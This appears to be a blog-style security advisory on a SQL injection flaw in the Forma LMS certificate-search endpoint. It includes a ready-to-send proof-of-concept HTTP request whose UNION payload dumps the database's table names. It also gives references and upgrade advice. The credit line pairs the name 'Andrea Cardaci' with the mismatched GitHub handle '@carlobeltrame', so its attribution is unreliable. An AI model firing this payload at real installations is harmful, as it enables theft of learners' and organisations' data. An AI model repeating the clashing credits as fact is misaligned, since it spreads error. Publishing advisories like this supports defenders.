CVE-2022-41680: Forma LMS 3.1. and Earlier Versions Vulnerable to SQL Injection
Forma LMS is a popular, open-source Learning Management System (LMS) that has been widely used by many organizations to manage and deliver e-learning courses. Recently, a serious security vulnerability has been discovered in version 3.1. and earlier of Forma LMS. This vulnerability, assigned the CVE identifier CVE-2022-41680, is a SQL injection vulnerability that could potentially enable an authenticated attacker (with a "student" role) to dump the entire database. This blog post will provide an overview of the exploit details, the vulnerable code, and original references for this vulnerability.
Exploit Details
In the affected versions of Forma LMS, the 'search[value]' parameter in the "appLms/ajax.server.php?r=mycertificate/getMyCertificates" function is vulnerable to SQL injection.
An attacker with the role of a student could potentially exploit this vulnerability to dump the entire database, resulting in a potential breach of sensitive information.
Vulnerable Code Snippet
The affected code snippet is part of the "search[value]" parameter in the "getMyCertificates()" function.
In "appLms/ajax.server.php", the vulnerable function "getMyCertificates()" is defined as follows
function getMyCertificates()
{
...
$filter_text = Get::req('search[value]', DOTY_STRING, '');
...
$iso_certificate_user->addSearchFilter($filter_text);
...
$results = $iso_certificate_user->findAll();
...
}
In this code snippet, the user-supplied input from the "search[value]" parameter is retrieved using the "Get::req()" function and stored in the variable "$filter_text." This value is then passed to the "addSearchFilter()" method, which is part of the "iso_certificate_user" object, without any proper input validation or sanitization. As a result, an attacker could potentially inject malicious SQL queries to manipulate or dump the data in the database.
Proof of Concept
Assuming that an attacker has access to a Forma LMS instance with a student role, the attacker could exploit this SQL injection vulnerability using the following HTTP request:
POST /appLms/ajax.server.php?r=mycertificate/getMyCertificates HTTP/1.1
Host: vulnerable-forma-lms.example.com
Content-Type: application/x-www-form-urlencoded
search[value]=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(table_name) from information_schema.tables WHERE table_schema=database()-- -
This HTTP request includes an SQL injection payload, which will execute the SQL query in the "search[value]" parameter to dump all table names from the current database.
Original References
The vulnerability was initially reported by Andrea Cardaci (GitHub: @carlobeltrame) on the Forma LMS GitHub repository:
- Issue: https://github.com/formalms/forma.lms/issues/235
- Patch: https://github.com/formalms/forma.lms/commit/9f116119ee573752b3465d5c8d1d9ac3dffa07b7
The official Forma LMS security announcement can be found here
- https://www.formalms.org/security-announcements/571-cve-2022-41680-sql-injection-vulnerability.html
Mitigation
To mitigate the vulnerability, users are advised to update their Forma LMS installations to version 3.1.1 or later, as it includes the necessary patches to address the SQL injection vulnerability. If updating is not feasible, users should apply the patch available on the GitHub repository to their Forma LMS installations to secure their systems from potential attacks.
Conclusion
SQL injection vulnerabilities in web applications, like the one discovered in Forma LMS, are dangerous and can lead to unauthorized access and disclosure of sensitive information. Keeping software up to date and applying security patches promptly is crucial to ensure the security of web applications. Forma LMS users are encouraged to take immediate action to mitigate the risk posed by the CVE-2022-41680 vulnerability.
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:06:00 UTC